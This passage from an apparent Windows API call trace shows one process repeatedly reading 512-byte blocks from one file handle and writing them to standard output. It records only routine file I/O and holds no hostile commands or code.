(_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.514] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.514] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType 
(hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.514] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] GetFileType (hFile=0x50) returned 0x1 [0152.515] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0152.515] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.515] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.515] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.515] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, 
lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.516] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.517] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.517] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] GetFileType (hFile=0x50) returned 0x1 [0152.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.517] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: 
hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.518] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.518] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 
[0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.520] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.520] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, 
lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.521] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.522] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 
0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.523] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.523] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) 
returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle 
